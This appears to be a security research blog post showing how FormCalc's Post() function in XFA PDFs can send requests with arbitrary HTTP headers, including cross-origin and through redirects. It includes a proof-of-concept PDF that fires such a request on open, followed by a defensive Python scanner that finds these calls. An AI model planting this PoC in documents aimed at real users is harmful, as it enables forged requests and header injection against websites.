PDF - Mess with the web
In this post I am going to talk about the vulnerabilities I found during the research for my AppSec Talk in Amsterdam.
Formcalc and header manipulation
I already wrote about the capability of formcalc to read same-origin files.
The formcalc language offers another feature, which is quite powerful.
The Post function has five parameters; the last one lets you specify arbitrary HTTP headers. You can set ANY header you want (apart from User-Agent), and the values you supply replace the headers a browser would normally send, so the request can carry a different Host header, Content-Type, Content-Length, Referer and so on.
Note: you can use this to send specially crafted requests cross-origin, as long as you don't care about the response. When a POST with custom headers is sent same-origin but the response is a 307 temporary redirect, Acrobat Reader follows the redirect, preserves the custom headers and sends the request, but you won't be able to read the response.
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% a little bit modified to show possible header injection via formcalc

%PDF-1. % can be truncated to %PDF-\0

1 0 obj
<<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config>
<template>
<subform name="_">
<pageSet/>
<field id="Hello World!">
<event activity="initialize">
<script contentType='application/x-formcalc'>
Post("http://sameOrigin.com/index.html","YOUR POST DATA","text/plain","utf-8","Content-Type: Dolphin
Test: AAA")
</script>
</event>
</field>
</subform>
</template>
</xdp:xdp>
endstream
endobj

trailer
<<
/Root <<
/AcroForm <<
/Fields [<< /T (0) /Kids [<< /Subtype /Widget /Rect  /T () /FT /Btn >>] >>]
/XFA 1 0 R
>>
/Pages <<>>
>>
>>
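For reviewers who need to spot this pattern in documents, here is an added Python scanner (not code from the post) that pulls FormCalc Post() calls out of a PDF's XFA scripts and reports which headers the fifth argument tries to set. It assumes the XFA stream is stored uncompressed and uses the post's own sample PDF, embedded inline, as constructed input.

```python
import re

# Constructed sample input: the XFA stream of the post's PDF, embedded inline
# (whitespace added for readability; the FormCalc script is the one from the post).
SAMPLE_PDF = b"""%PDF-1.
1 0 obj <<>> stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template><subform name="_"><pageSet/>
<field id="Hello World!"><event activity="initialize">
<script contentType='application/x-formcalc'>
Post("http://sameOrigin.com/index.html","YOUR POST DATA","text/plain","utf-8","Content-Type: Dolphin
Test: AAA")
</script></event></field></subform></template>
</xdp:xdp>
endstream endobj
"""

# Headers the post singles out as ones the client would normally control itself.
OVERRIDABLE = {"host", "content-type", "content-length", "referer"}

FORMCALC_SCRIPT = re.compile(
    rb"<script[^>]*contentType=['\"]application/x-formcalc['\"][^>]*>(.*?)</script>",
    re.S | re.I)
# A Post(...) call whose arguments are string literals (quotes may span lines).
POST_CALL = re.compile(rb'Post\s*\(((?:"(?:[^"\\]|\\.)*"|[^)"])*)\)', re.I)
STRING_LIT = re.compile(rb'"((?:[^"\\]|\\.)*)"')

def find_formcalc_posts(pdf_bytes):
    """Return one record per FormCalc Post() call: target URL, headers from the 5th argument."""
    findings = []
    for script in FORMCALC_SCRIPT.findall(pdf_bytes):
        for call in POST_CALL.finditer(script):
            args = [s.decode("latin-1") for s in STRING_LIT.findall(call.group(1))]
            headers = []
            if len(args) >= 5:
                # Each line of the header argument is "Name: value"; a newline
                # inside the literal means more than one header is being injected.
                for line in re.split(r"\r?\n", args[4]):
                    name, sep, value = line.partition(":")
                    if sep:
                        headers.append((name.strip(), value.strip()))
            findings.append({"url": args[0] if args else "", "headers": headers,
                             "overrides": [n for n, _ in headers if n.lower() in OVERRIDABLE]})
    return findings

if __name__ == "__main__":
    for f in find_formcalc_posts(SAMPLE_PDF):
        print(f"Post to {f['url']}: headers={f['headers']} overrides={f['overrides']}")
```

Real-world XFA streams are usually FlateDecode-compressed, so run this over the decoded stream contents rather than the raw file.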